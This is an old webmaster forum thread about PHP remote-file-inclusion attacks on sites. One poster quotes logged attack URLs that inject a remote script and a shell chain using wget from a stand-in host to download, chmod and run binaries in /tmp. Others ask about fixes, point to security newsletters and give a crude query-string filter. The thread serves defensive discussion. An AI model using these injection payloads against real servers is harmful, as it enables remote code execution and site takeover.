I can tell you that PHP attacks are on the rise and there are many types of attacks. I have a listener on my sites for attacks and I log all strange query strings and attempted "puts", "gets", "posts" and "head" requests.

What I have found is that people making these attacks have written indexing bots that make attempts on blocks of sites. My log also shows them hitting every site on individule server machines which tells me they are using a reverse DNS lookup. My guess is that if a bot makes an attempt and gets something back it likes then it logs that URL and they actual attacker comes back to get his hands on your site directly. Now I don't use PHP for any of my sites but he is a little taste of some attempts that are all PHP realated.

My guess is this is how they found you.

attempts:

http://www.fakeURL.com/send_reminders.php?includedir=http://someIP/cmd.dat?&cmd=cd%20/tmp;wget%someIP/haita;chmod%20744%20haita;./haita;echo%20YYY;echo

http://www.fakeURL.com/Forums/admin/admin_styles.php
http://www.fakeURL.com/modules?phpbb_root_path=http://someIP/cmd.dat?&cmd=cd%20/tmp;wget%someIP/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo¦
http://www.fakeURL.com/cvs?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://someIP/cmd.gif?&cmd=cd%20/tmp;wget%someIP/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo¦
http://www.fakeURL.com/modules/includes/functions_admin.php?phpbb_root_path=http://someIP/cmd.dat?&cmd=cd%20/tmp;wget%someIP/haita;chmod%20744%20haita;./haita;echo%20YYY;echo¦

And they go on and on and on. There are so many different ones and there are some I don't want to post because script kitties might get their claws on them but I can tell you that in the time it took me to type this out I received over 100 attempts accross 2 servers over here. From what I have seen I am deathly afraid to use PHP.

[edited by: trillianjedi at 10:10 pm (utc) on Mar. 16, 2006]

[edited by: engine at 11:32 pm (utc) on Mar. 16, 2006]
[edit reason] Examplifying [/edit]

[fakeURL.com...]
[fakeURL.com...]

How do they get my password with that?

Demaestro unfortunately my sites are 100% PHP so im stuck trying to plug up the holes... any one have any advice on stopping these attacks?

I honestly don't have much more info then the examples I provided. There must be PHP patches available for this as the attacks are rampant. I mean honestly I get so many different ones for PHP everyday and they change so much I could post examples all day and they would all be unique attacks.

I have to say in a morbid way I was interested to hear that one of these exploits were able to harbor your password. I am not sure what most of these attacks are trying to do but the ones with the wget; in the strings. These are building an executable piece of code in the query string and remotely executing it after implanting it. I am not exactly sure on specifics but it seems they are able to execute code through the query string some how.

A good way to stay current is by going to
www.sans.org/newsletter

There are mailing lists you can sign up for. The "@RISK The Consensus Security Alert" newsletter is one you may want to get on. They give notice for a lot of patches as they come out.

Good luck and post back if you are able to patch this, so if someone else gets in trouble and finds this they can follow your links to help.

Also I would be curious to see what it takes to fix this.

Also, it looks like the URIs DMaestro posted all contain "wget", which is not likely to be a part of any valid query string. Of course, there're not many log entries posted, but check to see if even a small part of the bogus requests is consistent, or perhaps you could find several consistencies within a variety of attacks. You could use these consistencies to recognize and handle the offender(s). While the 2 listings you posted are very different (and the first one looks normal), any $_SERVER["QUERY_STRING"] that contains "http" is suspect and could be checked pretty easily:

if (eregi("http",$_SERVER["QUERY_STRING"])) {

header("Location: [link to 18USC1030]");

}